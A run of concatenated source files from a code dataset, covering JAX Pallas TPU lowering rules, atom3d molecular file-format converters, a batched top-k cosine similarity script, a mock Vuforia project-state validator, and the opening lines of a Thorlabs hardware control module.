a, s in zip(args, should_discharge)\n ]\n return args\n\n\nlowering_rules[for_loop.for_p] = _for_lowering_rule\n\n\ndef _lower_jaxpr_to_unrolled_for_loop(ctx: LoweringRuleContext,\n jaxpr: jax_core.Jaxpr, start: int,\n num_steps: int, consts, *args,\n has_loop_index: bool):\n for i in range(start, start + num_steps):\n if has_loop_index:\n lowering_context = ctx.lowering_context.replace(\n block_shapes=ctx.block_shapes)\n args = jaxpr_subcomp(\n lowering_context, jaxpr, *consts,\n ir_constant(i, mlir_type=mlir.dtype_to_ir_type(jnp.dtype('int32'))),\n *args)\n else:\n lowering_context = ctx.lowering_context.replace(\n block_shapes=ctx.block_shapes[:len(consts)]\n + ctx.block_shapes[len(consts) + 1:],\n )\n args = jaxpr_subcomp(lowering_context, jaxpr, *consts, *args)\n return args\n\n\ndef _scan_lowering_rule(\n ctx: LoweringRuleContext,\n *args,\n jaxpr: jax_core.Jaxpr,\n linear: tuple[bool, ...],\n length: int,\n reverse: bool,\n unroll: bool,\n num_consts: int,\n num_carry: int,\n):\n # Can only handle fori_loop-like scans\n num_extensive = len(args) - num_consts - num_carry\n if num_extensive: raise NotImplementedError\n if reverse: raise NotImplementedError\n del linear, num_extensive, unroll, reverse\n\n jaxpr, jaxpr_consts = jaxpr.jaxpr, jaxpr.consts\n if jaxpr_consts: raise NotImplementedError\n del jaxpr_consts\n\n jaxpr, has_loop_index = (\n pallas_utils.pattern_match_scan_to_fori_loop(jaxpr, num_consts, num_carry)\n )\n consts, args = split_list(args, [num_consts])\n if has_loop_index:\n loop_index_start, *args = args\n else:\n loop_index_start = 0\n out = _lower_jaxpr_to_unrolled_for_loop(ctx, jaxpr, loop_index_start, length,\n consts, *args,\n has_loop_index=has_loop_index)\n if 
has_loop_index:\n out = [ir_constant(length,\n mlir_type=mlir.dtype_to_ir_type(jnp.dtype('int32'))),\n *out]\n return out\nlowering_rules[lax.scan_p] = _scan_lowering_rule\n\ndef _cond_lowering_rule(ctx: LoweringRuleContext, *args, branches, linear):\n del linear\n if len(branches) > 2:\n raise NotImplementedError\n pred, *args = args\n out_types = map(aval_to_ir_type, ctx.avals_out)\n pred = arith.TruncIOp(\n aval_to_ir_type(jax_core.ShapedArray((), jnp.bool_)), pred\n ).result\n # Specialize to singleton `if`s\n singleton = len(out_types) == 1\n if singleton:\n out_types = out_types[0]\n if_op = scf.IfOp(pred, out_types, hasElse=True)\n lowering_context = ctx.lowering_context.replace(\n block_shapes=ctx.block_shapes[1:],\n )\n with ir.InsertionPoint(if_op.then_block):\n out = jaxpr_subcomp(lowering_context, branches[1].jaxpr, *args)\n scf.YieldOp(out)\n with ir.InsertionPoint(if_op.else_block):\n out = jaxpr_subcomp(lowering_context, branches[0].jaxpr, *args)\n scf.YieldOp(out)\n if singleton:\n return if_op.result\n return if_op.results\n\n\nlowering_rules[lax.cond_p] = _cond_lowering_rule\n\n\ndef _pjit_lowering_rule(ctx: LoweringRuleContext, *args, jaxpr, **_):\n args = [\n a if isinstance(a, ir.Value) else ir_constant(a, aval_to_ir_type(aval))\n for a, aval in zip(args, ctx.avals_in)\n ]\n lowering_context = ctx.lowering_context.replace(block_shapes=ctx.block_shapes)\n return jaxpr_subcomp(lowering_context, jaxpr.jaxpr, *args)\n\n\nlowering_rules[pjit.pjit_p] = _pjit_lowering_rule\n\n\ndef _custom_jvp_call_lowering_rule(\n ctx: LoweringRuleContext,\n *args,\n call_jaxpr: jax_core.Jaxpr,\n jvp_jaxpr_thunk: Callable,\n num_consts: int,\n symbolic_zeros: bool,\n):\n del jvp_jaxpr_thunk\n if symbolic_zeros: raise NotImplementedError\n if num_consts: raise NotImplementedError\n if call_jaxpr.consts: raise NotImplementedError\n lowering_context = ctx.lowering_context.replace(block_shapes=ctx.block_shapes)\n return jaxpr_subcomp(lowering_context, call_jaxpr.jaxpr, *args)\n\n\nlowering_rules[custom_derivatives.custom_jvp_call_p] = (\n _custom_jvp_call_lowering_rule)\n\n\ndef _debug_callback_lowering_rule(ctx: LoweringRuleContext, *args, **kwargs):\n del ctx, args, kwargs\n # No-op debug callbacks in Mosaic for now\n return []\n\n\nlowering_rules[debugging.debug_callback_p] = _debug_callback_lowering_rule\n\n\ndef _program_id_lowering_rule(ctx: LoweringRuleContext, *, axis: int):\n if ctx.lowering_context.grid_indices is None:\n raise ValueError(\n f\"program id: {axis} was passed, but user did not provide a grid.\"\n )\n length = len(ctx.lowering_context.grid_indices)\n if not (0 <= axis < length):\n raise ValueError(\n f\"user passed in program id with axis: {axis}, but grid only has\"\n f\" length: {length}\"\n )\n return ctx.lowering_context.grid_indices[axis]\nlowering_rules[primitives.program_id_p] = _program_id_lowering_rule\n\n\ndef _repeat_lowering_rule(ctx: LoweringRuleContext, x, *, repeats, axis):\n (out_aval,) = ctx.avals_out\n return tpu.RepeatOp(aval_to_ir_type(out_aval), x, axis, repeats).result\n\n\nlowering_rules[tpu_primitives.repeat_p] = _repeat_lowering_rule\n\n\ndef _slice_lowering_rule(\n ctx: LoweringRuleContext, *args, limit_indices, start_indices, strides\n):\n \"\"\"Lowers a slice to vector dialect.\"\"\"\n (aval_out,) = ctx.avals_out\n if strides is None:\n strides = [1] * len(start_indices)\n\n sizes = np.array(limit_indices) - np.array(start_indices)\n\n op = vector.ExtractStridedSliceOp(\n aval_to_ir_type(aval_out), args[0], start_indices, sizes, strides\n )\n 
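# --- Editor's aside (illustrative sketch) ---
# Both _for_lowering_rule and _lower_jaxpr_to_unrolled_for_loop above avoid
# emitting a hardware loop: they re-lower the body jaxpr once per step and
# thread the carried values through Python. The semantics being reproduced
# are those of a fully unrolled fori_loop:
def unrolled_fori(start, num_steps, body, carry, has_loop_index=True):
    """Python model of the unrolled lowering: the body is inlined per step."""
    for i in range(start, start + num_steps):
        carry = body(i, carry) if has_loop_index else body(carry)
    return carry

# Sum 0..4 by unrolling five copies of the body:
assert unrolled_fori(0, 5, lambda i, acc: acc + i, 0) == 10
# --- end aside ---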
return op.result\n\n\nlowering_rules[lax.slice_p] = _slice_lowering_rule\n\n\ndef _xor_lowering_rule(ctx: LoweringRuleContext, x, y):\n if isinstance(x, (np.generic, np.ndarray, int, float)):\n x = ir_constant(x)\n if isinstance(y, (np.generic, np.ndarray, int, float)):\n y = ir_constant(y)\n return arith.XOrIOp(x, y).result\n\n\nlowering_rules[lax.xor_p] = _xor_lowering_rule\n\n\ndef _shift_left_lowering_rule(ctx: LoweringRuleContext, x, d):\n if isinstance(x, (np.generic, np.ndarray, int)):\n x = ir_constant(x)\n if isinstance(d, (np.generic, np.ndarray, int)):\n d = ir_constant(d)\n return arith.ShLIOp(x, d).result\n\n\nlowering_rules[lax.shift_left_p] = _shift_left_lowering_rule\n\n\ndef _shift_right_logical_lowering_rules(ctx: LoweringRuleContext, x, d):\n if isinstance(x, (np.generic, np.ndarray, int)):\n x = ir_constant(x)\n if isinstance(d, (np.generic, np.ndarray, int)):\n d = ir_constant(d)\n return arith.ShRUIOp(x, d).result\n\n\nlowering_rules[lax.shift_right_logical_p] = _shift_right_logical_lowering_rules\n\n\ndef _trace_start_lowering_rule(\n ctx: LoweringRuleContext, *, message: str, level: int\n):\n return tpu.TraceStartOp(message=message, level=level).results\n\n\nlowering_rules[tpu_primitives.trace_start_p] = _trace_start_lowering_rule\n\n\ndef _trace_stop_lowering_rule(ctx: LoweringRuleContext):\n return tpu.TraceStopOp().results\n\n\nlowering_rules[tpu_primitives.trace_stop_p] = _trace_stop_lowering_rule\n","sub_path":"jax/_src/pallas/mosaic/lowering.py","file_name":"lowering.py","file_ext":"py","file_size_in_byte":47157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"147579948","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Python version: 3.6\nimport time\nfrom itertools import islice\nimport torch\nfrom torch import nn, autograd\nimport numpy as np\nimport pdb\n\ndataset = \"../data/Eurlex/train.txt\"\nnum_sample = 15539\n\ndef check_data(files,num_sample):\n with open(files, 'r', encoding='utf-8') as f:\n file_array = f.readlines()\n print(len(file_array))\n \n lines = []\n lines += [file_array[i] for i in range(num_sample)]\n count = 0\n for line in lines:\n itms = line.strip().split()\n try:\n y_idxs = [int(itm) for itm in itms[0].split(',')]\n except:\n print(line)\n\ncheck_data(dataset, num_sample)\n ","sub_path":"utils/check_data.py","file_name":"check_data.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"181664541","text":"\"\"\"Methods to convert between different file formats.\"\"\"\nimport collections as col\nimport gzip\nimport os\nimport re\n\nimport Bio.PDB.Atom\nimport Bio.PDB.Chain\nimport Bio.PDB.Model\nimport Bio.PDB.Residue\nimport Bio.PDB.Structure\nimport numpy as np\nimport pandas as pd\n\npatterns = {\n 'pdb': 'pdb[0-9]*$',\n 'pdb.gz': 'pdb[0-9]*\\.gz$',\n 'mmcif': '(mm)?cif$',\n 'sharded': '@[0-9]+',\n 'sdf': 'sdf[0-9]*$',\n 'xyz': 'xyz[0-9]*$',\n 'silent': 'out$',\n}\n\n_regexes = {k: re.compile(v) for k, v in patterns.items()}\n\n\ndef is_sharded(f):\n \"\"\"If file is in sharded format.\"\"\"\n return _regexes['sharded'].search(str(f))\n\n\ndef is_pdb(f):\n \"\"\"If file is in pdb format.\"\"\"\n return _regexes['pdb'].search(str(f))\n\n\ndef is_mmcif(f):\n \"\"\"If file is in mmcif format.\"\"\"\n return _regexes['mmcif'].search(str(f))\n\n\ndef is_sdf(f):\n \"\"\"If file is in sdf format.\"\"\"\n return _regexes['sdf'].search(str(f))\n\n\ndef is_pdb_gz(f):\n \"\"\"If file 
is in pdb.gz format.\"\"\"\n return _regexes['pdb.gz'].search(str(f))\n\ndef is_xyz(f):\n \"\"\"If file is in xyz format.\"\"\"\n return _regexes['xyz'].search(str(f))\n\n\ndef read_any(f, name=None):\n \"\"\"Read file into biopython structure.\"\"\"\n if is_pdb(f):\n return read_pdb(f, name)\n elif is_pdb_gz(f):\n return read_pdb_gz(f, name)\n elif is_mmcif(f):\n return read_mmcif(f, name)\n elif is_sdf(f):\n return read_sdf(f, name)\n elif is_xyz(f):\n return read_xyz(f, name)\n else:\n raise ValueError(f\"Unrecognized filetype for {f:}\")\n\n\ndef read_pdb_gz(pdb_gz_file, name=None):\n if name is None:\n name = os.path.basename(pdb_gz_file)\n parser = Bio.PDB.PDBParser(QUIET=True)\n bp = parser.get_structure(\n name, gzip.open(pdb_gz_file, mode='rt', encoding='latin1'))\n return bp\n\n\ndef read_pdb(pdb_file, name=None):\n \"\"\"Load pdb file into biopython representation.\"\"\"\n if name is None:\n name = os.path.basename(pdb_file)\n parser = Bio.PDB.PDBParser(QUIET=True)\n bp = parser.get_structure(name, pdb_file)\n return bp\n\n\ndef read_mmcif(mmcif_file, name=None):\n \"\"\"Load mmcif file into biopython representation.\"\"\"\n if name is None:\n name = os.path.basename(mmcif_file)\n parser = Bio.PDB.MMCIFParser(QUIET=True)\n return parser.get_structure(name, mmcif_file)\n\n\ndef read_sdf(sdf_file, name=None, sanitize=False, add_hs=False, remove_hs=False):\n dflist = []\n molecules = read_sdf_to_mol(sdf_file, sanitize=sanitize,\n add_h=add_hs, remove_h=remove_hs)\n for im,m in enumerate(molecules):\n if m is not None:\n df = mol_to_df(m, residue=im,\n ensemble = m.GetProp(\"_Name\"),\n structure = m.GetProp(\"_Name\"),\n model = m.GetProp(\"_Name\"))\n dflist.append(df)\n assert len(dflist) >= 1\n if len(dflist) > 1:\n bp = df_to_bp(merge_dfs(dflist))\n else:\n bp = df_to_bp(dflist[0])\n\n return bp\n\n\ndef read_sdf_multi(sdf_files, name=None, sanitize=False, add_hs=False, remove_hs=False):\n dflist = []\n for sdf_file in sdf_files:\n molecules = read_sdf_to_mol(sdf_file, sanitize=sanitize,\n add_h=add_hs, remove_h=remove_hs)\n for im,m in enumerate(molecules):\n if m is not None:\n df = mol_to_df(m, residue=im,\n ensemble = m.GetProp(\"_Name\"),\n structure = m.GetProp(\"_Name\"),\n model = m.GetProp(\"_Name\"))\n dflist.append(df)\n bp = df_to_bp(merge_dfs(dflist))\n return bp\n\n\ndef combine_sdfs(sdf_files, big_sdf):\n \"\"\"Concatenate several SDF files into one.\"\"\"\n with open(big_sdf, 'w') as outfile:\n for fname in sdf_files:\n with open(fname) as infile:\n for line in infile:\n outfile.write(line)\n\n\ndef write_pdb(out_file, structure, **kwargs):\n \"\"\"Write a biopython structure to a pdb file.\"\"\"\n io = Bio.PDB.PDBIO()\n io.set_structure(structure)\n io.save(out_file, **kwargs)\n return\n\n\ndef write_mmcif(out_file, structure):\n \"\"\"Write a biopython structure to an mmcif file.\"\"\"\n io = Bio.PDB.MMCIFIO()\n io.set_structure(structure)\n io.save(out_file)\n return\n\n\ndef read_xyz_to_df(inputfile, gdb_data=False):\n \"\"\"Read an XYZ file (optionally with GDB9-specific data)\"\"\"\n with open(inputfile) as f:\n # Reading number of atoms in the molecule\n num_atoms = int(f.readline().strip())\n # Loading GDB ID and label data\n line_labels = f.readline().strip().split('\\t')\n name = line_labels[0]\n if gdb_data: data = [float(ll) for ll in line_labels[1:]]\n # Skip atom data (will be read using pandas below)\n for n in range(num_atoms): f.readline()\n # Harmonic vibrational frequencies\n if gdb_data:\n freq = [float(ll) for ll in 
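# --- Editor's aside (illustrative sketch; paths hypothetical) ---
# The `patterns` table at the top of this module drives all of the is_*
# predicates, and read_any chains them to dispatch on the filename. The
# predicates use re.search on str(f), so pathlib.Path objects and suffixed
# names like "model.pdb3" (pdb plus trailing digits) also match:
import re
patterns = {'pdb': r'pdb[0-9]*$', 'pdb.gz': r'pdb[0-9]*\.gz$', 'sharded': r'@[0-9]+'}
_regexes = {k: re.compile(v) for k, v in patterns.items()}
assert _regexes['pdb'].search("structures/1abc.pdb")
assert _regexes['pdb.gz'].search("structures/1abc.pdb.gz")
assert _regexes['sharded'].search("shards/data@128")
# --- end aside ---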
f.readline().strip().split('\\t')]\n # SMILES and InChI\n if gdb_data: smiles = f.readline().strip().split('\\t')[0]\n if gdb_data: inchi = f.readline().strip().split('\\t')[0]\n # Define columns: element, x, y, z, Mulliken charges (GDB only)\n columns = ['element','x', 'y', 'z']\n if gdb_data: columns += ['charge']\n # Load atom information\n molecule = pd.read_table(inputfile, names=columns,\n skiprows=2, nrows=num_atoms,\n delim_whitespace=True)\n # Name the dataframe\n molecule.name = name\n molecule.index.name = name\n # return molecule info\n if gdb_data:\n return molecule, data, freq, smiles, inchi\n else:\n return molecule\n\n\ndef read_xyz(xyz_file, name=None, gdb=False):\n \"\"\"Load xyz file in to biopython representation.\"\"\"\n # Load the xyz file into a dataframe\n if gdb:\n df, data, freq, smiles, inchi = read_xyz_to_df(xyz_file, gdb_data=True)\n else:\n df = read_xyz_to_df(xyz_file)\n if name is not None: df.index.name = name\n # Make up atom names\n elements = df['element'].unique()\n el_count = {}\n for e in elements:\n el_count[e] = 0\n new_name = []\n for el in df['element']:\n el_count[el] += 1\n new_name.append('%s%i'%(el,el_count[el]))\n # Fill additional fields\n df['ensemble'] = [df.name.replace(' ','_')]*len(df)\n df['subunit'] = [0]*len(df)\n df['structure'] = [df.name.replace(' ','_')]*len(df)\n df['model'] = [0]*len(df)\n df['chain'] = ['L']*len(df)\n df['hetero'] = ['']*len(df)\n df['insertion_code'] = ['']*len(df)\n df['residue'] = [1]*len(df)\n df['segid'] = ['LIG']*len(df)\n df['resname'] = ['LIG']*len(df)\n df['altloc'] = ['']*len(df)\n df['occupancy'] = [1.]*len(df)\n df['bfactor'] = [0.]*len(df)\n df['name'] = new_name\n df['fullname'] = new_name\n df['serial_number'] = range(len(df))\n # Convert to biopython representation\n bp = df_to_bp(df)\n if gdb:\n return bp, data, freq, smiles, inchi\n else:\n return bp\n\n\ndef bp_to_df(bp):\n \"\"\"Convert biopython representation to pandas dataframe representation.\"\"\"\n df = col.defaultdict(list)\n for atom in Bio.PDB.Selection.unfold_entities(bp, 'A'):\n residue = atom.get_parent()\n chain = residue.get_parent()\n model = chain.get_parent()\n df['ensemble'].append(bp.get_id())\n df['subunit'].append(0)\n df['structure'].append(bp.get_id())\n df['model'].append(model.serial_num)\n df['chain'].append(chain.id)\n df['hetero'].append(residue.id[0])\n df['insertion_code'].append(residue.id[2])\n df['residue'].append(residue.id[1])\n df['segid'].append(residue.segid)\n df['resname'].append(residue.resname)\n df['altloc'].append(atom.altloc)\n df['occupancy'].append(atom.occupancy)\n df['bfactor'].append(atom.bfactor)\n df['x'].append(atom.coord[0])\n df['y'].append(atom.coord[1])\n df['z'].append(atom.coord[2])\n df['element'].append(atom.element)\n df['name'].append(atom.name)\n df['fullname'].append(atom.fullname)\n df['serial_number'].append(atom.serial_number)\n df = pd.DataFrame(df)\n return df\n\n\ndef df_to_bp(df_in):\n \"\"\"Convert dataframe representaion to biopython representation.\"\"\"\n all_structures = df_to_bps(df_in)\n if len(all_structures) > 1:\n raise RuntimeError('More than one structure in provided dataframe.')\n return all_structures[0]\n\n\ndef df_to_bps(df_in):\n \"\"\"Convert dataframe representation to biopython representations.\"\"\"\n df = df_in.copy()\n all_structures = []\n for (structure, s_atoms) in split_df(df_in, ['ensemble', 'structure']):\n new_structure = Bio.PDB.Structure.Structure(structure[1])\n for (model, m_atoms) in df.groupby(['model']):\n new_model = 
Bio.PDB.Model.Model(model)\n for (chain, c_atoms) in m_atoms.groupby(['chain']):\n new_chain = Bio.PDB.Chain.Chain(chain)\n for (residue, r_atoms) in c_atoms.groupby(\n ['hetero', 'residue', 'insertion_code']):\n # Take first atom as representative for residue values.\n rep = r_atoms.iloc[0]\n new_residue = Bio.PDB.Residue.Residue(\n (rep['hetero'], rep['residue'], rep['insertion_code']),\n rep['resname'], rep['segid'])\n for row, atom in r_atoms.iterrows():\n new_atom = Bio.PDB.Atom.Atom(\n atom['name'],\n [atom['x'], atom['y'], atom['z']],\n atom['bfactor'],\n atom['occupancy'],\n atom['altloc'],\n atom['fullname'],\n atom['serial_number'],\n atom['element'])\n new_residue.add(new_atom)\n new_chain.add(new_residue)\n new_model.add(new_chain)\n new_structure.add(new_model)\n all_structures.append(new_structure)\n return all_structures\n\n\ndef split_df(df, key):\n return [(x, y) for x, y in df.groupby(key)]\n\n\ndef merge_dfs(dfs):\n return pd.concat(dfs).reset_index(drop=True)\n\n\ndef bp_from_xyz_dict(data, struct_name='structure'):\n \"\"\"Construct a biopython structure from xyz data (stored in a dict).\"\"\"\n # Read info from dictionary\n elements = data['elements']\n charges = data['charges']\n coordinates = data['coordinates']\n # Create a residue\n # (each small molecule is counted as just one residue)\n r = Bio.PDB.Residue.Residue((' ', 1, ' '), 'res', 0)\n # Iterate through all atoms and collect info\n for i in range(len(charges)):\n atom_name = elements[i] + str(i)\n position = coordinates[i]\n full_name = elements[i] + str(i)\n b_factor = 0.0\n occupancy = 1.0\n alt_loc = ' '\n serial_n = i\n element = elements[i]\n # Create an atom with the provided information\n a = Bio.PDB.Atom.Atom(atom_name,\n position,\n b_factor,\n occupancy,\n alt_loc,\n full_name,\n serial_n,\n element=element)\n # Add the atom to the residue\n r.add(a)\n # Create one chain and add the residue\n c = Bio.PDB.Chain.Chain('A')\n c.add(r)\n # Create one model and add the chain\n m = Bio.PDB.Model.Model(0)\n m.add(c)\n # Create one structure and add the model\n s = Bio.PDB.Structure.Structure(struct_name)\n s.add(m)\n return s\n\n\ndef read_sdf_to_mol(sdf_file, sanitize=False, add_h=False, remove_h=False):\n \"\"\"Reads a list of molecules from an SDF file.\n\n Args:\n add_h (bool): Adds hydrogens. Default: False\n remove_h (bool): Removes hydrogen. Default: False\n sanitize (bool): Tries to sanitize the molecule. 
Default: False\n\n \"\"\"\n\n suppl = Chem.SDMolSupplier(sdf_file, sanitize=sanitize, removeHs=remove_h)\n\n molecules = [mol for mol in suppl]\n\n if add_h:\n for mol in molecules:\n if mol is not None:\n mol = Chem.AddHs(mol, addCoords=True)\n\n return molecules\n\n\ndef get_coordinates_of_conformer(mol):\n \"\"\"Reads the coordinates of the conformer\n\n Args:\n mol (Mol): Molecule in RDKit format.\n\n Returns:\n xyz (float array): Coordinates\n\n \"\"\"\n\n symb = [a.GetSymbol() for a in mol.GetAtoms()]\n conf = mol.GetConformer()\n xyz = np.empty([mol.GetNumAtoms(), 3])\n\n for ia, name in enumerate(symb):\n position = conf.GetAtomPosition(ia)\n xyz[ia] = np.array([position.x, position.y, position.z])\n\n return xyz\n\n\ndef get_connectivity_matrix_from_mol(mol):\n \"\"\"Generates the connection matrix from a molecule.\n\n Args:\n mol (Mol): a molecule in RDKit format\n\n Returns:\n connect_matrix (2D numpy array): connectivity matrix\n\n \"\"\"\n\n # Initialization\n num_at = mol.GetNumAtoms()\n connect_matrix = np.zeros([num_at, num_at], dtype=int)\n\n # Go through all atom pairs and check for bonds between them\n for a in mol.GetAtoms():\n for b in mol.GetAtoms():\n bond = mol.GetBondBetweenAtoms(a.GetIdx(), b.GetIdx())\n if bond is not None:\n connect_matrix[a.GetIdx(), b.GetIdx()] = 1\n\n return connect_matrix\n\n\ndef get_bonds_matrix_from_mol(mol):\n \"\"\"\n Provides bond matrix from a molecule.\n Bond types are encoded as double:\n single bond (1.0)\n double bond (2.0)\n triple bond (3.0)\n aromatic bond (1.5).\n\n Args:\n mol (Mol): a molecule in RDKit format\n\n Returns:\n connect_matrix (2D numpy array): connectivity matrix\n\n \"\"\"\n\n # Initialization\n num_at = mol.GetNumAtoms()\n bonds_matrix = np.zeros([num_at, num_at])\n\n # Go through all atom pairs and check for bonds between them\n for a in mol.GetAtoms():\n for b in mol.GetAtoms():\n bond = mol.GetBondBetweenAtoms(a.GetIdx(), b.GetIdx())\n if bond is not None:\n bt = bond.GetBondTypeAsDouble()\n bonds_matrix[a.GetIdx(), b.GetIdx()] = bt\n\n return bonds_matrix\n\n\ndef get_bonds_list_from_mol(mol):\n \"\"\"\n Extract bonds from a molecule.\n Bond types are encoded as double:\n single bond (1.0)\n double bond (2.0)\n triple bond (3.0)\n aromatic bond (1.5).\n\n Args:\n mol (Mol): a molecule in RDKit format\n\n Returns:\n bonds_df (pandas dataframe): list of bonds\n\n \"\"\"\n bonds_list = []\n for b in mol.GetBonds():\n atom1 = b.GetBeginAtomIdx()\n atom2 = b.GetEndAtomIdx()\n btype = b.GetBondTypeAsDouble()\n bonds_list.append([atom1,atom2,btype])\n col = ['atom1','atom2','type']\n bonds_df = pd.DataFrame(bonds_list, columns=col)\n return bonds_df\n\n\ndef mol_to_df(mol, add_hs=False, structure=None, model=None, ensemble=None, residue=999):\n \"\"\"\n Convert Mol object to dataframe format (with PDB columns)\n \"\"\"\n from rdkit import Chem\n df = col.defaultdict(list)\n if add_hs:\n mol = Chem.AddHs(mol, addCoords=True)\n conf = mol.GetConformer()\n for i, a in enumerate(mol.GetAtoms()):\n position = conf.GetAtomPosition(i)\n df['ensemble'].append(ensemble)\n df['structure'].append(structure)\n df['model'].append(model)\n df['chain'].append('LIG')\n df['hetero'].append('')\n df['insertion_code'].append('')\n df['residue'].append(residue)\n df['segid'].append('')\n df['resname'].append('LIG')\n df['altloc'].append('')\n df['occupancy'].append(1)\n df['bfactor'].append(0)\n df['x'].append(position.x)\n df['y'].append(position.y)\n df['z'].append(position.z)\n df['element'].append(a.GetSymbol())\n 
df['serial_number'].append(i)\n df = pd.DataFrame(df)\n # Make up atom names\n elements = df['element'].unique()\n el_count = {}\n for e in elements:\n el_count[e] = 0\n new_name = []\n for el in df['element']:\n el_count[el] += 1\n new_name.append('%s%i'%(el,el_count[el]))\n df['name'] = new_name\n df['fullname'] = new_name\n return df\n\n\ndef get_coordinates_from_df(df):\n xyz = np.empty([len(df), 3])\n\n xyz[:, 0] = np.array(df.x)\n xyz[:, 1] = np.array(df.y)\n xyz[:, 2] = np.array(df.z)\n\n return xyz\n\n","sub_path":"atom3d/util/formats.py","file_name":"formats.py","file_ext":"py","file_size_in_byte":16586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"371618688","text":"import numpy as np\nimport timeit\nimport heapq\nimport gc\n\ndef CosinePairwise_V0(selfie, ID, k, batch_size):\n\tnotStart = True\n\ttopkCosIdx = []\n\tnSelfie = selfie.shape[0]\n\tnID = ID.shape[0]\n\tbaseNpArrange = np.arange(batch_size*nID)\n\tlogFile = open(\"logs/LogV0_{}_{}_{}.txt\".format(nSelfie, nID, batch_size),\"w\")\n\n\tfor row_i in range(0, int(nSelfie / batch_size) + 1):\n\t start = row_i * batch_size\n\t end = min([(row_i + 1) * batch_size, nSelfie])\n\t if end <= start:\n\t break\n\t startMatmul = timeit.default_timer()\n\t evalBatchCosPw =-np.matmul(selfie[start:end], ID.T).reshape((-1,))\n\t stopMatmul = timeit.default_timer()\n\t \n\t startNpArrange = timeit.default_timer()\n\t batchIndex = baseNpArrange + (start * nID)\n\t stopNpArrange = timeit.default_timer()\n\t \n\t startHeap = timeit.default_timer()\n\t if (notStart):\n\t curLentopkCosIdx = len(topkCosIdx)\n\t if ((curLentopkCosIdx + (batch_size*nID)) > k):\n\t print(\"Conat {} and remain heap {}\".format(k-curLentopkCosIdx, batch_size*nID - k + curLentopkCosIdx))\n\t topkCosIdx = topkCosIdx + list(zip(evalBatchCosPw[:(k-curLentopkCosIdx)], batchIndex[:(k-curLentopkCosIdx)]))\n\t print(\"Init heap\") \n\t topkCosIdx = list(topkCosIdx)\n\t gc.collect()\n\t heapq.heapify(topkCosIdx)\n\t notStart = False\n\t curIndex = k-curLentopkCosIdx\n\t print(\"Start for heap\")\n\t for aCos in evalBatchCosPw[(k-curLentopkCosIdx):]:\n\t if (topkCosIdx[0][0] < aCos):\n\t heapq.heappushpop(topkCosIdx, (aCos, batchIndex[curIndex]))\n\t curIndex += 1\n\t else:\n\t print(\"Concat All\")\n\t topkCosIdx = topkCosIdx + list(zip(evalBatchCosPw, batchIndex))\n\t else:\n\t print(\"Heap all\")\n\t curIndex = 0\n\t for aCos in evalBatchCosPw:\n\t if (topkCosIdx[0][0] < aCos):\n\t heapq.heappushpop(topkCosIdx, (aCos, batchIndex[curIndex]))\n\t curIndex += 1\n\t stopHeap = timeit.default_timer()\n\t evalBatchCosPw = []\n\t batchIndex = []\n\t gc.collect()\n\t \n\t outStr = \"Process row: ({}:{}). Matmul time: {}s. Np Arange time: {}s. 
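# --- Editor's aside (illustrative sketch) ---
# The batching logic above maintains a fixed-size min-heap of the k best
# scores: once the heap holds k entries, each new candidate is compared
# against the heap root (the current worst of the best) and pushed via
# heappushpop only if it beats it. The core pattern, isolated:
import heapq

def top_k(scores, k):
    """Return the k largest (score, index) pairs using a bounded min-heap."""
    heap = []
    for idx, s in enumerate(scores):
        if len(heap) < k:
            heapq.heappush(heap, (s, idx))
        elif heap[0][0] < s:                 # beats the current worst kept
            heapq.heappushpop(heap, (s, idx))
    return sorted(heap, reverse=True)

assert top_k([0.1, 0.9, 0.5, 0.7], 2) == [(0.9, 1), (0.7, 3)]
# --- end aside ---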
Heap time: {}s\".format(start, end, stopMatmul - startMatmul, stopNpArrange - startNpArrange, stopHeap - startHeap)\n\t print(outStr)\n\t logFile.write(\"%s\\n\" %(outStr))\n\n\tlogFile.close()\n\treturn topkCosIdx\n\ndef idx2RC(topkCosIdx, nID):\n\tk = len(topkCosIdx)\n\ttopkCosRCIndex = np.zeros((k,3))\n\tfor i in range(k):\n\t (curCos, curIndex) = heapq.heappop(topkCosIdx)\n\t topkCosRCIndex[k-i-1] = [-curCos, curIndex // nID, curIndex % nID]\n\treturn topkCosRCIndex\n","sub_path":"ulti.py","file_name":"ulti.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"366395871","text":"\"\"\"\nValidators for the project state.\n\"\"\"\n\nfrom typing import Dict, Set\n\nfrom mock_vws._database_matchers import get_database_matching_client_keys\nfrom mock_vws._query_validators.exceptions import InactiveProject\nfrom mock_vws.database import VuforiaDatabase\nfrom mock_vws.states import States\n\n\ndef validate_project_state(\n request_path: str,\n request_headers: Dict[str, str],\n request_body: bytes,\n request_method: str,\n databases: Set[VuforiaDatabase],\n) -> None:\n \"\"\"\n Validate the state of the project.\n\n Args:\n request_path: The path of the request.\n request_headers: The headers sent with the request.\n request_body: The body of the request.\n request_method: The HTTP method of the request.\n databases: All Vuforia databases.\n\n Raises:\n InactiveProject: The project is inactive.\n \"\"\"\n database = get_database_matching_client_keys(\n request_headers=request_headers,\n request_body=request_body,\n request_method=request_method,\n request_path=request_path,\n databases=databases,\n )\n\n assert isinstance(database, VuforiaDatabase)\n if database.state != States.PROJECT_INACTIVE:\n return\n\n raise InactiveProject\n","sub_path":"src/mock_vws/_query_validators/project_state_validators.py","file_name":"project_state_validators.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"360836320","text":"import clr # installs DOTNET DLLs\nimport contextlib\nimport sys\nimport time\n\nfrom optics.hardware_control.hardware_addresses_and_constants import polarizer_offset, waveplate_offset\n\nsys.path.append(\"C:\\\\Program Files (x86)\\\\Thorlabs\\\\Kinesis\") # adds DLL path to PATH\n\n# DOTNET (x64) DLLs. 
